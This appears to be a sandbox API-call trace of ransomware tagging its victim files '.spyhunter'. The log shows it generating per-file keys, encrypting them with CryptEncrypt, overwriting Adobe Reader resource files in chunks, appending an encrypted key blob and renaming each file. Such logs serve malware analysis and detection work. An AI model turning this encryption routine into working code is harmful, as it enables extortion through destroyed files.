1 [0120.147] GetProcessHeap () returned 0x2c0000 [0120.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2eb7be8 [0120.147] wnsprintfW (in: pszDest=0x2eb7be8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-It.otf.spyhunter") returned 85 [0120.147] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-It.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-it.otf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-It.otf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-it.otf.spyhunter")) returned 1 [0120.147] GetProcessHeap () returned 0x2c0000 [0120.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7be8 | out: hHeap=0x2c0000) returned 1 [0120.148] GetProcessHeap () returned 0x2c0000 [0120.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0120.148] GetProcessHeap () returned 0x2c0000 [0120.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e63a20 | out: hHeap=0x2c0000) returned 1 [0120.148] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8d0 | out: pbBuffer=0x57f8d0) returned 1 [0120.148] GetProcessHeap () returned 0x2c0000 [0120.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0120.148] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8c8*=0x30) returned 1 [0120.148] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_GT.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_gt.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0120.162] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_GT.txt") returned 111 [0120.162] StrStrW (lpFirst="DisplayLanguageNames.es_GT.txt", lpSrch=".txt") returned=".txt" [0120.162] lstrlenW (lpString=".txt") returned 4 [0120.162] lstrlenW (lpString=".txt") returned 4 [0120.163] GetProcessHeap () returned 0x2c0000 [0120.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0120.163] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f88c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f88c*=0x2800, lpOverlapped=0x0) returned 1 [0120.186] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.186] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f88c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f88c*=0x2800, lpOverlapped=0x0) returned 1 [0120.187] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f88c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f88c*=0x2800, lpOverlapped=0x0) returned 1 [0120.188] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.188] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f88c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f88c*=0x2800, lpOverlapped=0x0) returned 1 [0120.188] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f88c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f88c*=0x1ec8, lpOverlapped=0x0) returned 1 [0120.188] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffe138, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.189] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1ec8, lpNumberOfBytesWritten=0x57f88c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f88c*=0x1ec8, lpOverlapped=0x0) returned 1 [0120.189] GetProcessHeap () returned 0x2c0000 [0120.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0120.189] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.189] WriteFile (in: hFile=0x154, lpBuffer=0x57f8cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f88c, lpOverlapped=0x0 | out: lpBuffer=0x57f8cc*, lpNumberOfBytesWritten=0x57f88c*=0x4, lpOverlapped=0x0) returned 1 [0120.189] WriteFile (in: hFile=0x154, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f88c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f88c*=0x30, lpOverlapped=0x0) returned 1 [0120.189] CloseHandle (hObject=0x154) returned 1 [0120.189] GetProcessHeap () returned 0x2c0000 [0120.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ed7c78 [0120.189] wnsprintfW (in: pszDest=0x2ed7c78, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_GT.txt.spyhunter") returned 121 [0120.190] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_GT.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_gt.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_GT.txt.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_gt.txt.spyhunter")) returned 1 [0120.190] GetProcessHeap () returned 0x2c0000 [0120.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed7c78 | out: hHeap=0x2c0000) returned 1 [0120.190] GetProcessHeap () returned 0x2c0000 [0120.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0120.190] GetProcessHeap () returned 0x2c0000 [0120.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e831a0 | out: hHeap=0x2c0000) returned 1 [0120.191] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8c8 | out: pbBuffer=0x57f8c8) returned 1 [0120.191] GetProcessHeap () returned 0x2c0000 [0120.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0120.192] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8c0*=0x30) returned 1 [0120.192] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW_STROKE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw_stroke.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0120.193] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW_STROKE.txt") returned 118 [0120.193] StrStrW (lpFirst="DisplayLanguageNames.zh_TW_STROKE.txt", lpSrch=".txt") returned=".txt" [0120.193] lstrlenW (lpString=".txt") returned 4 [0120.193] lstrlenW (lpString=".txt") returned 4 [0120.193] GetProcessHeap () returned 0x2c0000 [0120.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0120.193] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f884, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f884*=0x2800, lpOverlapped=0x0) returned 1 [0120.258] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.258] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f884, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f884*=0x2800, lpOverlapped=0x0) returned 1 [0120.259] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f884, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f884*=0x2800, lpOverlapped=0x0) returned 1 [0120.259] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.259] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f884, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f884*=0x2800, lpOverlapped=0x0) returned 1 [0120.259] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f884, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f884*=0x108c, lpOverlapped=0x0) returned 1 [0120.260] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffef74, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.260] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x108c, lpNumberOfBytesWritten=0x57f884, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f884*=0x108c, lpOverlapped=0x0) returned 1 [0120.260] GetProcessHeap () returned 0x2c0000 [0120.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0120.261] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.261] WriteFile (in: hFile=0x154, lpBuffer=0x57f8c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f884, lpOverlapped=0x0 | out: lpBuffer=0x57f8c4*, lpNumberOfBytesWritten=0x57f884*=0x4, lpOverlapped=0x0) returned 1 [0120.261] WriteFile (in: hFile=0x154, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f884, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f884*=0x30, lpOverlapped=0x0) returned 1 [0120.261] CloseHandle (hObject=0x154) returned 1 [0120.261] GetProcessHeap () returned 0x2c0000 [0120.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0120.261] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW_STROKE.txt.spyhunter") returned 128 [0120.261] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW_STROKE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw_stroke.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW_STROKE.txt.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw_stroke.txt.spyhunter")) returned 1 [0120.262] GetProcessHeap () returned 0x2c0000 [0120.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0120.262] GetProcessHeap () returned 0x2c0000 [0120.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0120.262] GetProcessHeap () returned 0x2c0000 [0120.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e87430 | out: hHeap=0x2c0000) returned 1 [0120.263] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8c0 | out: pbBuffer=0x57f8c0) returned 1 [0120.263] GetProcessHeap () returned 0x2c0000 [0120.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0120.263] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8b8*=0x30) returned 1 [0120.263] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\SaslPrepProfile_norm_bidi.spp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\saslprep\\saslprepprofile_norm_bidi.spp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0120.263] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\SaslPrepProfile_norm_bidi.spp") returned 92 [0120.264] StrStrW (lpFirst="SaslPrepProfile_norm_bidi.spp", lpSrch=".txt") returned 0x0 [0120.264] GetProcessHeap () returned 0x2c0000 [0120.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0120.264] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f87c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f87c*=0x2800, lpOverlapped=0x0) returned 1 [0120.272] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.272] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f87c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f87c*=0x2800, lpOverlapped=0x0) returned 1 [0120.272] GetProcessHeap () returned 0x2c0000 [0120.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0120.272] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.272] WriteFile (in: hFile=0x154, lpBuffer=0x57f8bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f87c, lpOverlapped=0x0 | out: lpBuffer=0x57f8bc*, lpNumberOfBytesWritten=0x57f87c*=0x4, lpOverlapped=0x0) returned 1 [0120.417] WriteFile (in: hFile=0x154, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f87c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f87c*=0x30, lpOverlapped=0x0) returned 1 [0120.417] CloseHandle (hObject=0x154) returned 1 [0120.417] GetProcessHeap () returned 0x2c0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0120.417] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\SaslPrepProfile_norm_bidi.spp.spyhunter") returned 102 [0120.417] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\SaslPrepProfile_norm_bidi.spp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\saslprep\\saslprepprofile_norm_bidi.spp"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\SaslPrepProfile_norm_bidi.spp.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\saslprep\\saslprepprofile_norm_bidi.spp.spyhunter")) returned 1 [0120.418] GetProcessHeap () returned 0x2c0000 [0120.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0120.418] GetProcessHeap () returned 0x2c0000 [0120.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0120.419] GetProcessHeap () returned 0x2c0000 [0120.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4e1e8 | out: hHeap=0x2c0000) returned 1 [0120.419] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8c0 | out: pbBuffer=0x57f8c0) returned 1 [0120.419] GetProcessHeap () returned 0x2c0000 [0120.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0120.419] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8b8*=0x30) returned 1 [0120.419] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\symbol.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\symbol.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0120.467] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\symbol.txt") returned 99 [0120.467] StrStrW (lpFirst="symbol.txt", lpSrch=".txt") returned=".txt" [0120.467] lstrlenW (lpString=".txt") returned 4 [0120.467] lstrlenW (lpString=".txt") returned 4 [0120.467] GetProcessHeap () returned 0x2c0000 [0120.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0120.468] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f87c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f87c*=0x2800, lpOverlapped=0x0) returned 1 [0120.550] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.550] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f87c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f87c*=0x2800, lpOverlapped=0x0) returned 1 [0120.550] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f87c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f87c*=0x8d, lpOverlapped=0x0) returned 1 [0120.550] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff73, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.550] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x8d, lpNumberOfBytesWritten=0x57f87c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f87c*=0x8d, lpOverlapped=0x0) returned 1 [0120.550] GetProcessHeap () returned 0x2c0000 [0120.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0120.550] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.550] WriteFile (in: hFile=0xec, lpBuffer=0x57f8bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f87c, lpOverlapped=0x0 | out: lpBuffer=0x57f8bc*, lpNumberOfBytesWritten=0x57f87c*=0x4, lpOverlapped=0x0) returned 1 [0120.551] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f87c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f87c*=0x30, lpOverlapped=0x0) returned 1 [0120.551] CloseHandle (hObject=0xec) returned 1 [0120.551] GetProcessHeap () returned 0x2c0000 [0120.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0120.551] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\symbol.txt.spyhunter") returned 109 [0120.551] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\symbol.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\symbol.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\symbol.txt.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\symbol.txt.spyhunter")) returned 1 [0120.555] GetProcessHeap () returned 0x2c0000 [0120.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0120.555] GetProcessHeap () returned 0x2c0000 [0120.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0120.555] GetProcessHeap () returned 0x2c0000 [0120.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee1900 | out: hHeap=0x2c0000) returned 1 [0120.556] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8b8 | out: pbBuffer=0x57f8b8) returned 1 [0120.556] GetProcessHeap () returned 0x2c0000 [0120.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0120.556] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8b0*=0x30) returned 1 [0120.556] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\UKRAINE.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\ukraine.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0120.579] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\UKRAINE.TXT") returned 98 [0120.579] StrStrW (lpFirst="UKRAINE.TXT", lpSrch=".txt") returned 0x0 [0120.579] GetProcessHeap () returned 0x2c0000 [0120.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0120.580] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f874, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f874*=0x121a, lpOverlapped=0x0) returned 1 [0120.702] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffede6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.702] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x121a, lpNumberOfBytesWritten=0x57f874, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f874*=0x121a, lpOverlapped=0x0) returned 1 [0120.702] GetProcessHeap () returned 0x2c0000 [0120.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0120.702] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.703] WriteFile (in: hFile=0xb4, lpBuffer=0x57f8b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f874, lpOverlapped=0x0 | out: lpBuffer=0x57f8b4*, lpNumberOfBytesWritten=0x57f874*=0x4, lpOverlapped=0x0) returned 1 [0120.703] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f874, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f874*=0x30, lpOverlapped=0x0) returned 1 [0120.703] CloseHandle (hObject=0xb4) returned 1 [0120.705] GetProcessHeap () returned 0x2c0000 [0120.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0120.705] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\UKRAINE.TXT.spyhunter") returned 108 [0120.705] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\UKRAINE.TXT" (normalized: "c:\\program files 